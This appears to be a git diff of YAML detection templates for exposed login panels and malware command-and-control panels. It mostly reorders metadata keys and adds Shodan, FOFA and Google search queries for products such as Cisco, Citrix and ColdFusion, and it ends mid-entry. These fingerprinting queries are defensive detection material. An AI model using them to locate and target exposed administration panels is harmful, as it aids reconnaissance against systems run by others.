-10,9 +10,9 @@ info: - https://twitter.com/TLP_R3D/status/1654038602282565632 - https://github.com/n1nj4sec/pupy metadata: + verified: true max-request: 1 shodan-query: aa3939fc357723135870d5036b12a67097b03309 - verified: true tags: c2,ir,osint,pupyc2,panel http: diff --git a/http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml b/http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml index 02959fa844..71479d7822 100644 --- a/http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml +++ b/http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml @@ -8,8 +8,8 @@ info: - https://twitter.com/0xperator/status/1677873700610162690 - https://github.com/alex14324/Rhadamanthys-Stealer metadata: - max-request: 1 verified: true + max-request: 1 tags: c2,rhadamanthys,stealer,panel http: diff --git a/http/exposed-panels/c2/supershell-c2.yaml b/http/exposed-panels/c2/supershell-c2.yaml index 0de7bff39c..821db9b4ab 100644 --- a/http/exposed-panels/c2/supershell-c2.yaml +++ b/http/exposed-panels/c2/supershell-c2.yaml @@ -10,9 +10,9 @@ info: - https://twitter.com/S4nsLimit3/status/1693619836339859497 - https://github.com/tdragon6/Supershell/blob/main/README_EN.md metadata: - fofa-query: icon_hash="-1010228102" - max-request: 1 verified: true + max-request: 1 + fofa-query: icon_hash="-1010228102" tags: c2,ir,osint,supershell,panel http: diff --git a/http/exposed-panels/c2/viper-c2.yaml b/http/exposed-panels/c2/viper-c2.yaml index 88ce93aee0..8a26d2021e 100644 --- a/http/exposed-panels/c2/viper-c2.yaml +++ b/http/exposed-panels/c2/viper-c2.yaml @@ -9,10 +9,10 @@ info: reference: - https://twitter.com/MichalKoczwara/status/1635724410274414596 metadata: - censys-query: 057f3b5488605b4d224d038e340866e2cdfed4a3 + verified: "true" max-request: 1 shodan-query: http.html_hash:1015055567 - verified: "true" + censys-query: 057f3b5488605b4d224d038e340866e2cdfed4a3 tags: tech,viper,c2,malware,ir,panel http: diff --git a/http/exposed-panels/cacti-panel.yaml b/http/exposed-panels/cacti-panel.yaml index e998a1a95e..0f8fda5aac 100644 --- a/http/exposed-panels/cacti-panel.yaml +++ b/http/exposed-panels/cacti-panel.yaml @@ -14,10 +14,20 @@ info: metadata: verified: true max-request: 2 - product: cacti vendor: cacti - shodan-query: http.favicon.hash:-1797138069 - fofa-query: icon_hash="-1797138069" + product: cacti + shodan-query: + - http.favicon.hash:-1797138069 + - http.title:"login to cacti" + - http.title:"cacti" + - http.favicon.hash:"-1797138069" + fofa-query: + - icon_hash="-1797138069" + - title="cacti" + - title="login to cacti" + google-query: + - intitle:"login to cacti" + - intitle:"cacti" tags: cacti,login,panel,detect http: diff --git a/http/exposed-panels/cas-login.yaml b/http/exposed-panels/cas-login.yaml index 69deb8264c..b5d77d6898 100644 --- a/http/exposed-panels/cas-login.yaml +++ b/http/exposed-panels/cas-login.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:apereo:central_authentication_service:*:*:*:*:*:*:*:* metadata: - github: https://github.com/apereo/cas max-request: 1 - product: central_authentication_service - shodan-query: http.title:'CAS - Central Authentication Service' vendor: apereo + product: central_authentication_service + shodan-query: + - http.title:'CAS - Central Authentication Service' + - http.title:'cas - central authentication service' + github: https://github.com/apereo/cas + fofa-query: title='cas - central authentication service' + google-query: intitle:'cas - central authentication service' tags: apereo,cas,panel,login http: diff --git a/http/exposed-panels/casaos-panel.yaml b/http/exposed-panels/casaos-panel.yaml index 60d8bec6a2..17fbcb2c03 100644 --- a/http/exposed-panels/casaos-panel.yaml +++ b/http/exposed-panels/casaos-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: html:"CasaOS" - verified: true tags: panel,casaos,login,detect http: diff --git a/http/exposed-panels/casdoor-login.yaml b/http/exposed-panels/casdoor-login.yaml index a425aef2af..768bacaee8 100644 --- a/http/exposed-panels/casdoor-login.yaml +++ b/http/exposed-panels/casdoor-login.yaml @@ -13,9 +13,13 @@ info: cpe: cpe:2.3:a:casbin:casdoor:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: casdoor - shodan-query: http.title:"Casdoor" vendor: casbin + product: casdoor + shodan-query: + - http.title:"Casdoor" + - http.title:"casdoor" + fofa-query: title="casdoor" + google-query: intitle:"casdoor" tags: panel,casdoor,casbin http: diff --git a/http/exposed-panels/casemanager-panel.yaml b/http/exposed-panels/casemanager-panel.yaml index a86d060782..dc546b3df7 100644 --- a/http/exposed-panels/casemanager-panel.yaml +++ b/http/exposed-panels/casemanager-panel.yaml @@ -9,8 +9,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: title="CaseManager" max-request: 1 + fofa-query: title="CaseManager" tags: casemanager,panel http: diff --git a/http/exposed-panels/caton-network-manager-system.yaml b/http/exposed-panels/caton-network-manager-system.yaml index 5ea1913c64..830c9c5ea5 100644 --- a/http/exposed-panels/caton-network-manager-system.yaml +++ b/http/exposed-panels/caton-network-manager-system.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Caton Network Manager System" - verified: true tags: caton,manager,login,panel http: diff --git a/http/exposed-panels/ccm-detect.yaml b/http/exposed-panels/ccm-detect.yaml index 9244e1dd55..dbea138b5a 100644 --- a/http/exposed-panels/ccm-detect.yaml +++ b/http/exposed-panels/ccm-detect.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.html:"CCM - Authentication Failure" - verified: true tags: panel,clearcom,ccm http: diff --git a/http/exposed-panels/centreon-panel.yaml b/http/exposed-panels/centreon-panel.yaml index 58f87a48a1..3a5ebe2336 100644 --- a/http/exposed-panels/centreon-panel.yaml +++ b/http/exposed-panels/centreon-panel.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:centreon:centreon_web:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: centreon_web - shodan-query: http.title:"Centreon" vendor: centreon + product: centreon_web + shodan-query: + - http.title:"Centreon" + - http.title:"centreon" + fofa-query: title="centreon" + google-query: intitle:"centreon" tags: panel,centreon,login http: diff --git a/http/exposed-panels/changedetection-panel.yaml b/http/exposed-panels/changedetection-panel.yaml index 9d1bbc86a7..bf62f88b06 100644 --- a/http/exposed-panels/changedetection-panel.yaml +++ b/http/exposed-panels/changedetection-panel.yaml @@ -10,9 +10,9 @@ info: - https://github.com/dgtlmoon/changedetection.io - https://changedetection.io/ metadata: + verified: true max-request: 1 shodan-query: title:"Change Detection" - verified: true tags: panel,changedetection,detect http: diff --git a/http/exposed-panels/checkmk/checkmk-login.yaml b/http/exposed-panels/checkmk/checkmk-login.yaml index b423ced58d..bec999ce36 100644 --- a/http/exposed-panels/checkmk/checkmk-login.yaml +++ b/http/exposed-panels/checkmk/checkmk-login.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:tribe29:checkmk:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: checkmk vendor: tribe29 + product: checkmk tags: login,tech,synology,rackstation,panel,tribe29 http: diff --git a/http/exposed-panels/checkpoint/ssl-network-extender.yaml b/http/exposed-panels/checkpoint/ssl-network-extender.yaml index 336df52378..43f430fc67 100644 --- a/http/exposed-panels/checkpoint/ssl-network-extender.yaml +++ b/http/exposed-panels/checkpoint/ssl-network-extender.yaml @@ -13,11 +13,20 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:checkpoint:ssl_network_extender:*:*:*:*:-:*:*:* metadata: - google-query: intitle:"SSL Network Extender Login" max-request: 1 - product: ssl_network_extender - shodan-query: http.title:"Check Point SSL Network Extender" vendor: checkpoint + product: ssl_network_extender + shodan-query: + - http.title:"Check Point SSL Network Extender" + - http.title:"check point ssl network extender" + - http.title:"ssl network extender login" + google-query: + - intitle:"SSL Network Extender Login" + - intitle:"ssl network extender login" + - intitle:"check point ssl network extender" + fofa-query: + - title="check point ssl network extender" + - title="ssl network extender login" tags: panel,checkpoint,router http: diff --git a/http/exposed-panels/chronos-panel.yaml b/http/exposed-panels/chronos-panel.yaml index fdb20d8a8d..aabc6e2ab0 100644 --- a/http/exposed-panels/chronos-panel.yaml +++ b/http/exposed-panels/chronos-panel.yaml @@ -9,10 +9,10 @@ info: reference: - https://www.asys.fr/chronos metadata: - fofa-query: body="chronoslogin.js" + verified: true max-request: 1 shodan-query: http.html:"chronoslogin.js" - verified: true + fofa-query: body="chronoslogin.js" tags: panel,chronos,login,detect http: diff --git a/http/exposed-panels/cisco-firepower-panel.yaml b/http/exposed-panels/cisco-firepower-panel.yaml index da59aded97..e0aaac88e8 100644 --- a/http/exposed-panels/cisco-firepower-panel.yaml +++ b/http/exposed-panels/cisco-firepower-panel.yaml @@ -10,9 +10,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: html:"cisco firepower management" - verified: true tags: login,cisco,panel,console http: diff --git a/http/exposed-panels/cisco-unity-panel.yaml b/http/exposed-panels/cisco-unity-panel.yaml index e109b0e066..210792249c 100644 --- a/http/exposed-panels/cisco-unity-panel.yaml +++ b/http/exposed-panels/cisco-unity-panel.yaml @@ -7,9 +7,9 @@ info: description: | A Cisco Unity Connection instance was detected. metadata: + verified: true max-request: 2 shodan-query: html:"Cisco Unity Connection" - verified: true tags: panel,cisco,unity,login,detect http: diff --git a/http/exposed-panels/cisco/cisco-anyconnect-vpn.yaml b/http/exposed-panels/cisco/cisco-anyconnect-vpn.yaml index 0d3f6df1d7..0514ce24e8 100644 --- a/http/exposed-panels/cisco/cisco-anyconnect-vpn.yaml +++ b/http/exposed-panels/cisco/cisco-anyconnect-vpn.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:a:cisco:anyconnect_secure_mobility_client:*:*:*:*:windows:*:*:* metadata: max-request: 1 - product: anyconnect_secure_mobility_client vendor: cisco + product: anyconnect_secure_mobility_client tags: cisco,panel,vpn http: diff --git a/http/exposed-panels/cisco/cisco-asa-panel.yaml b/http/exposed-panels/cisco/cisco-asa-panel.yaml index 549f7107cc..03b963d458 100644 --- a/http/exposed-panels/cisco/cisco-asa-panel.yaml +++ b/http/exposed-panels/cisco/cisco-asa-panel.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: adaptive_security_appliance_software vendor: cisco + product: adaptive_security_appliance_software tags: cisco,panel http: diff --git a/http/exposed-panels/cisco/cisco-edge-340.yaml b/http/exposed-panels/cisco/cisco-edge-340.yaml index 58777fc4cb..7f2098c09c 100644 --- a/http/exposed-panels/cisco/cisco-edge-340.yaml +++ b/http/exposed-panels/cisco/cisco-edge-340.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:o:cisco:edge_340_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: edge_340_firmware - shodan-query: http.title:"Cisco Edge 340" vendor: cisco + product: edge_340_firmware + shodan-query: + - http.title:"Cisco Edge 340" + - http.title:"cisco edge 340" + fofa-query: title="cisco edge 340" + google-query: intitle:"cisco edge 340" tags: panel,cisco http: diff --git a/http/exposed-panels/cisco/cisco-expressway-panel.yaml b/http/exposed-panels/cisco/cisco-expressway-panel.yaml index da05d10e66..9de3c2a082 100644 --- a/http/exposed-panels/cisco/cisco-expressway-panel.yaml +++ b/http/exposed-panels/cisco/cisco-expressway-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.cisco.com/c/en/us/products/unified-communications/expressway-series/index.html metadata: + verified: true max-request: 1 shodan-query: html:"Cisco Expressway" - verified: true tags: panel,cisco,login,detect http: diff --git a/http/exposed-panels/cisco/cisco-finesse-login.yaml b/http/exposed-panels/cisco/cisco-finesse-login.yaml index 6cc147d625..ff8298d87d 100644 --- a/http/exposed-panels/cisco/cisco-finesse-login.yaml +++ b/http/exposed-panels/cisco/cisco-finesse-login.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:a:cisco:finesse:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: finesse vendor: cisco + product: finesse tags: panel,cisco,edb http: diff --git a/http/exposed-panels/cisco/cisco-integrated-login.yaml b/http/exposed-panels/cisco/cisco-integrated-login.yaml index 05e8a275bc..449bdaf726 100644 --- a/http/exposed-panels/cisco/cisco-integrated-login.yaml +++ b/http/exposed-panels/cisco/cisco-integrated-login.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:a:cisco:integrated_management_controller:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: integrated_management_controller vendor: cisco + product: integrated_management_controller tags: panel,cisco,edb http: diff --git a/http/exposed-panels/cisco/cisco-ios-xe-panel.yaml b/http/exposed-panels/cisco/cisco-ios-xe-panel.yaml index 5dbc02e7fb..5e56c0a84d 100644 --- a/http/exposed-panels/cisco/cisco-ios-xe-panel.yaml +++ b/http/exposed-panels/cisco/cisco-ios-xe-panel.yaml @@ -13,11 +13,11 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:o:cisco:ios_xe:*:*:*:*:*:*:*:* metadata: + verified: "true" max-request: 2 + vendor: cisco product: ios_xe shodan-query: http.html_hash:1076109428 - vendor: cisco - verified: "true" tags: panel,cisco,ssl ssl: - address: "{{Host}}:{{Port}}" diff --git a/http/exposed-panels/cisco/cisco-onprem-panel.yaml b/http/exposed-panels/cisco/cisco-onprem-panel.yaml index 619ff6936c..19e0a2a994 100644 --- a/http/exposed-panels/cisco/cisco-onprem-panel.yaml +++ b/http/exposed-panels/cisco/cisco-onprem-panel.yaml @@ -12,12 +12,17 @@ info: classification: cpe: cpe:2.3:a:cisco:smart_software_manager_on-prem:*:*:*:*:*:*:*:* metadata: - fofa-query: title="On-Prem License Workspace" - max-request: 2 - product: smart_software_manager_on-prem - shodan-query: title:"On-Prem License Workspace" - vendor: cisco verified: true + max-request: 2 + vendor: cisco + product: smart_software_manager_on-prem + shodan-query: + - title:"On-Prem License Workspace" + - http.title:"on-prem license workspace" + fofa-query: + - title="On-Prem License Workspace" + - title="on-prem license workspace" + google-query: intitle:"on-prem license workspace" tags: cisco,manager,login,panel http: diff --git a/http/exposed-panels/cisco/cisco-prime-infrastructure.yaml b/http/exposed-panels/cisco/cisco-prime-infrastructure.yaml index 589de4f482..aec2c61881 100644 --- a/http/exposed-panels/cisco/cisco-prime-infrastructure.yaml +++ b/http/exposed-panels/cisco/cisco-prime-infrastructure.yaml @@ -12,9 +12,11 @@ info: cpe: cpe:2.3:a:cisco:prime_infrastructure:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cisco product: prime_infrastructure shodan-query: http.title:"prime infrastructure" - vendor: cisco + fofa-query: title="prime infrastructure" + google-query: intitle:"prime infrastructure" tags: panel,cisco http: diff --git a/http/exposed-panels/cisco/cisco-sd-wan.yaml b/http/exposed-panels/cisco/cisco-sd-wan.yaml index 383fa25abe..55b2fa514c 100644 --- a/http/exposed-panels/cisco/cisco-sd-wan.yaml +++ b/http/exposed-panels/cisco/cisco-sd-wan.yaml @@ -13,8 +13,9 @@ info: cpe: cpe:2.3:a:cisco:sd-wan:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: sd-wan vendor: cisco + product: sd-wan + shodan-query: cpe:"cpe:2.3:a:cisco:sd-wan" tags: panel,cisco http: diff --git a/http/exposed-panels/cisco/cisco-secure-desktop.yaml b/http/exposed-panels/cisco/cisco-secure-desktop.yaml index 7bb349dd37..ccd059d5bd 100644 --- a/http/exposed-panels/cisco/cisco-secure-desktop.yaml +++ b/http/exposed-panels/cisco/cisco-secure-desktop.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:cisco:secure_desktop:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: secure_desktop vendor: cisco + product: secure_desktop tags: cisco,panel http: diff --git a/http/exposed-panels/cisco/cisco-systems-login.yaml b/http/exposed-panels/cisco/cisco-systems-login.yaml index bf615685c0..60e1bdb3c4 100644 --- a/http/exposed-panels/cisco/cisco-systems-login.yaml +++ b/http/exposed-panels/cisco/cisco-systems-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: intitle:"Cisco Systems Login" max-request: 1 shodan-query: http.title:"Cisco Systems Login" + google-query: intitle:"Cisco Systems Login" tags: panel,cisco http: diff --git a/http/exposed-panels/cisco/cisco-telepresence.yaml b/http/exposed-panels/cisco/cisco-telepresence.yaml index a15f79e67a..e8ca2df71e 100644 --- a/http/exposed-panels/cisco/cisco-telepresence.yaml +++ b/http/exposed-panels/cisco/cisco-telepresence.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Cisco Telepresence" - verified: true tags: panel,cisco http: diff --git a/http/exposed-panels/cisco/cisco-ucs-kvm-login.yaml b/http/exposed-panels/cisco/cisco-ucs-kvm-login.yaml index fbd57909eb..ecd9d822e1 100644 --- a/http/exposed-panels/cisco/cisco-ucs-kvm-login.yaml +++ b/http/exposed-panels/cisco/cisco-ucs-kvm-login.yaml @@ -13,9 +13,13 @@ info: cpe: cpe:2.3:a:cisco:unified_computing_system:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: unified_computing_system - shodan-query: http.title:"Cisco UCS KVM Direct" vendor: cisco + product: unified_computing_system + shodan-query: + - http.title:"Cisco UCS KVM Direct" + - http.title:"cisco ucs kvm direct" + fofa-query: title="cisco ucs kvm direct" + google-query: intitle:"cisco ucs kvm direct" tags: panel,cisco,ucs,kvm http: diff --git a/http/exposed-panels/cisco/cisco-vmanage-login.yaml b/http/exposed-panels/cisco/cisco-vmanage-login.yaml index 387f20f781..d2d07d5e06 100644 --- a/http/exposed-panels/cisco/cisco-vmanage-login.yaml +++ b/http/exposed-panels/cisco/cisco-vmanage-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Cisco vManage" - verified: true tags: panel,cisco http: diff --git a/http/exposed-panels/cisco/cisco-webvpn-detect.yaml b/http/exposed-panels/cisco/cisco-webvpn-detect.yaml index 3c1915c944..d5f5f710a5 100644 --- a/http/exposed-panels/cisco/cisco-webvpn-detect.yaml +++ b/http/exposed-panels/cisco/cisco-webvpn-detect.yaml @@ -11,10 +11,10 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true + max-request: 2 fofa-query: fid="U1TP/SJklrT9VLIEpZkQNg==" google-query: intitle:"SSLVPN Service" - max-request: 2 - verified: true tags: panel,cisco,vpn http: diff --git a/http/exposed-panels/citrix-adc-gateway-detect.yaml b/http/exposed-panels/citrix-adc-gateway-detect.yaml index d531e2a1be..08f1b7b8a5 100644 --- a/http/exposed-panels/citrix-adc-gateway-detect.yaml +++ b/http/exposed-panels/citrix-adc-gateway-detect.yaml @@ -11,8 +11,11 @@ info: cpe: cpe:2.3:a:citrix:gateway:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: gateway vendor: citrix + product: gateway + shodan-query: http.title:"citrix gateway" + fofa-query: title="citrix gateway" + google-query: intitle:"citrix gateway" tags: panel,citrix http: diff --git a/http/exposed-panels/citrix-vpn-detect.yaml b/http/exposed-panels/citrix-vpn-detect.yaml index 804efdc634..057c563043 100644 --- a/http/exposed-panels/citrix-vpn-detect.yaml +++ b/http/exposed-panels/citrix-vpn-detect.yaml @@ -11,8 +11,11 @@ info: cpe: cpe:2.3:a:citrix:gateway:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: gateway vendor: citrix + product: gateway + shodan-query: http.title:"citrix gateway" + fofa-query: title="citrix gateway" + google-query: intitle:"citrix gateway" tags: panel,citrix http: diff --git a/http/exposed-panels/claris-filemaker-webdirect.yaml b/http/exposed-panels/claris-filemaker-webdirect.yaml index 74349c7f7c..13d3f8d43b 100644 --- a/http/exposed-panels/claris-filemaker-webdirect.yaml +++ b/http/exposed-panels/claris-filemaker-webdirect.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Claris FileMaker WebDirect" - verified: true tags: panel,edb http: diff --git a/http/exposed-panels/cleanweb-panel.yaml b/http/exposed-panels/cleanweb-panel.yaml index b98d5b4879..2b542faa6f 100644 --- a/http/exposed-panels/cleanweb-panel.yaml +++ b/http/exposed-panels/cleanweb-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://tentelemed.com/ metadata: + verified: true max-request: 1 shodan-query: http.title:"CleanWeb" - verified: true tags: panel,cleanweb,login,detect http: diff --git a/http/exposed-panels/clearpass-policy-manager.yaml b/http/exposed-panels/clearpass-policy-manager.yaml index bcd204dd5a..bca7f74b0f 100644 --- a/http/exposed-panels/clearpass-policy-manager.yaml +++ b/http/exposed-panels/clearpass-policy-manager.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:arubanetworks:clearpass_policy_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: clearpass_policy_manager - shodan-query: http.title:"ClearPass Policy Manager" vendor: arubanetworks + product: clearpass_policy_manager + shodan-query: + - http.title:"ClearPass Policy Manager" + - http.title:"clearpass policy manager" + fofa-query: title="clearpass policy manager" + google-query: intitle:"clearpass policy manager" tags: panel,aruba,arubanetworks http: diff --git a/http/exposed-panels/cloudpanel-login.yaml b/http/exposed-panels/cloudpanel-login.yaml index 15eefeca35..4bc6245370 100644 --- a/http/exposed-panels/cloudpanel-login.yaml +++ b/http/exposed-panels/cloudpanel-login.yaml @@ -7,12 +7,18 @@ info: classification: cpe: cpe:2.3:a:mgt-commerce:cloudpanel:*:*:*:*:*:*:*:* metadata: - fofa-query: icon_hash="151132309" - max-request: 1 - product: cloudpanel - shodan-query: http.favicon.hash:151132309 - vendor: mgt-commerce verified: true + max-request: 1 + vendor: mgt-commerce + product: cloudpanel + shodan-query: + - http.favicon.hash:151132309 + - http.title:"cloudpanel" + - http.favicon.hash:"151132309" + fofa-query: + - icon_hash="151132309" + - title="cloudpanel" + google-query: intitle:"cloudpanel" tags: panel,login,cloudpanel,detect,mgt-commerce http: diff --git a/http/exposed-panels/cobbler-webgui.yaml b/http/exposed-panels/cobbler-webgui.yaml index 003eb0353d..4f58e2981e 100644 --- a/http/exposed-panels/cobbler-webgui.yaml +++ b/http/exposed-panels/cobbler-webgui.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:cobblerd:cobbler:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: cobbler - shodan-query: http.title:"Cobbler Web Interface" vendor: cobblerd + product: cobbler + shodan-query: + - http.title:"Cobbler Web Interface" + - http.title:"cobbler web interface" + fofa-query: title="cobbler web interface" + google-query: intitle:"cobbler web interface" tags: cobbler,webserver,panel,cobblerd http: diff --git a/http/exposed-panels/code-server-login.yaml b/http/exposed-panels/code-server-login.yaml index ce1f1d0854..5f480a786b 100644 --- a/http/exposed-panels/code-server-login.yaml +++ b/http/exposed-panels/code-server-login.yaml @@ -10,11 +10,13 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:coder:code-server:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: coder product: code-server shodan-query: http.title:"code-server login" - vendor: coder - verified: true + fofa-query: title="code-server login" + google-query: intitle:"code-server login" tags: panel,detect,misc,coder http: diff --git a/http/exposed-panels/code42-panel.yaml b/http/exposed-panels/code42-panel.yaml index afaf429022..41dd702fae 100644 --- a/http/exposed-panels/code42-panel.yaml +++ b/http/exposed-panels/code42-panel.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:code42:code42:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: code42 vendor: code42 + product: code42 tags: panel,code42 http: diff --git a/http/exposed-panels/codemeter-webadmin-panel.yaml b/http/exposed-panels/codemeter-webadmin-panel.yaml index c4dd8324f3..eac42fd9b3 100644 --- a/http/exposed-panels/codemeter-webadmin-panel.yaml +++ b/http/exposed-panels/codemeter-webadmin-panel.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:wibu:codemeter:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: codemeter vendor: wibu + product: codemeter tags: codemeter,webadmin,panel,wibu http: diff --git a/http/exposed-panels/coldfusion-administrator-login.yaml b/http/exposed-panels/coldfusion-administrator-login.yaml index 2cdeac80fe..1d7e86dff6 100644 --- a/http/exposed-panels/coldfusion-administrator-login.yaml +++ b/http/exposed-panels/coldfusion-administrator-login.yaml @@ -11,9 +11,17 @@ info: cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: coldfusion - shodan-query: http.title:"ColdFusion Administrator Login" vendor: adobe + product: coldfusion + shodan-query: + - http.title:"ColdFusion Administrator Login" + - http.component:"adobe coldfusion" + - http.title:"coldfusion administrator login" + - cpe:"cpe:2.3:a:adobe:coldfusion" + fofa-query: + - app="adobe-coldfusion" + - title="coldfusion administrator login" + google-query: intitle:"coldfusion administrator login" tags: panel,coldfusion,adobe http: diff --git a/http/exposed-panels/compal-panel.yaml b/http/exposed-panels/compal-panel.yaml index 342aa5b8b0..ac6443303b 100644 --- a/http/exposed-panels/compal-panel.yaml +++ b/http/exposed-panels/compal-panel.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:o:compal:ch7465lg_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: ch7465lg_firmware vendor: compal + product: ch7465lg_firmware tags: panel,compal http: diff --git a/http/exposed-panels/compalex-panel-detect.yaml b/http/exposed-panels/compalex-panel-detect.yaml index f741dd8e85..6cbfc8bf64 100644 --- a/http/exposed-panels/compalex-panel-detect.yaml +++ b/http/exposed-panels/compalex-panel-detect.yaml @@ -7,10 +7,10 @@ info: reference: - http://compalex.net/ metadata: + verified: true max-request: 15 shodan-query: title:"COMPALEX" - verified: true - tags: tech,php,compalex,sql + tags: tech,php,compalex,sql,panel http: - method: GET diff --git a/http/exposed-panels/completeview-web-panel.yaml b/http/exposed-panels/completeview-web-panel.yaml index 3f4dee010d..410ae4f957 100644 --- a/http/exposed-panels/completeview-web-panel.yaml +++ b/http/exposed-panels/completeview-web-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"CompleteView Web Client" - verified: true tags: panel,completeview http: diff --git a/http/exposed-panels/concrete5/concrete5-install.yaml b/http/exposed-panels/concrete5/concrete5-install.yaml index 37dcd3d528..97aa30678f 100644 --- a/http/exposed-panels/concrete5/concrete5-install.yaml +++ b/http/exposed-panels/concrete5/concrete5-install.yaml @@ -10,11 +10,21 @@ info: classification: cpe: cpe:2.3:a:concrete5:concrete5:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: concrete5 - shodan-query: http.title:"Install concrete5" - vendor: concrete5 verified: true + max-request: 2 + vendor: concrete5 + product: concrete5 + shodan-query: + - http.title:"Install concrete5" + - cpe:"cpe:2.3:a:concrete5:concrete5" + - http.title:"install concrete5" + - http.title:"concrete5" + fofa-query: + - title="install concrete5" + - title="concrete5" + google-query: + - intitle:"concrete5" + - intitle:"install concrete5" tags: panel,install,concrete,cms,concrete5 http: diff --git a/http/exposed-panels/concrete5/concrete5-panel.yaml b/http/exposed-panels/concrete5/concrete5-panel.yaml index 0f4f85df24..96681f8cf5 100644 --- a/http/exposed-panels/concrete5/concrete5-panel.yaml +++ b/http/exposed-panels/concrete5/concrete5-panel.yaml @@ -11,9 +11,18 @@ info: cpe: cpe:2.3:a:concrete5:concrete5:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: concrete5 - shodan-query: http.title:"concrete5" vendor: concrete5 + product: concrete5 + shodan-query: + - http.title:"concrete5" + - cpe:"cpe:2.3:a:concrete5:concrete5" + - http.title:"install concrete5" + fofa-query: + - title="install concrete5" + - title="concrete5" + google-query: + - intitle:"concrete5" + - intitle:"install concrete5" tags: panel,concrete5,cms http: diff --git a/http/exposed-panels/connect-box-login.yaml b/http/exposed-panels/connect-box-login.yaml index a06eb455ff..1fdc18be74 100644 --- a/http/exposed-panels/connect-box-login.yaml +++ b/http/exposed-panels/connect-box-login.yaml @@ -10,11 +10,13 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:o:upc:connect_box_eurodocsis_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: connect_box_eurodocsis_firmware - shodan-query: NET-DK/1.0 - vendor: upc verified: true + max-request: 1 + vendor: upc + product: connect_box_eurodocsis_firmware + shodan-query: + - NET-DK/1.0 + - net-dk/1.0 tags: panel,connectbox,iot,upc http: diff --git a/http/exposed-panels/connectwise-backup-manager.yaml b/http/exposed-panels/connectwise-backup-manager.yaml index 